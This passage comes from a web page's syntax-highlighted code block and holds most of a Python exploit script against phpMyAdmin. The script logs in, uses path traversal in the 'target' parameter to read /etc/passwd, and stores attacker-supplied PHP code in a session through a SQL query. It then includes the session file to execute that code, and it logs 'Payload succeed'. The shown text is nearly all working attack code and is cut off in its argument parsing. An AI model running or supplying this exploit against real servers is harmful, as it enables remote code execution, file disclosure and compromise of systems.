class=\"crayon-h\"> <\/span><span class=\"crayon-v\">php_code<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PROXIES<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-39\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_token<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">session_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_rand_md5<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;set_session&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session_id<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;pma_username&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;pma_password&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;server&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;index.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;token&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">token<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">updir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-50\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dir_level <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">range<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">updir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;..\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dir_level<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-52\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;sql.php%3F\/..\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">updir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;etc\/passwd&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/sbin\/nologin&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/etc\/passwd is %d levels away&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dir_level<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">error<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;This version is not vulnerable, or the server is not linux&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_token<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/server_sql.php&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sql<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;select &#8216;&amp;lt;?php &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">php_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; ?&amp;gt;'&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">debug<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Executing SQL query %r&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sql<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/import.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;is_js_confirmed&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;token&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;pos&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;goto&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;server_sql.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;message_to_show&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Your SQL query has been executed successfully&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;prev_sql_query&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;sql_query&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sql<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;sql_delimiter&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;;&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;show_query&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;fk_checks&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;SQL&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Go&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;ajax_request&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;true&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/index.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;db_sql.php%3f\/..\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">updir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;var\/lib\/php\/sessions\/sess_&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;phpMyAdmin&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">site<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;result.html&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;w&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">site<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Payload succeed. Result is stored inside &#8220;result.html&#8221; file.&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">error<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Couldn&#8217;t run payload&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-90\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argparse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ArgumentParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-u&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;user&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-p&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;password&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-U&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;url&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 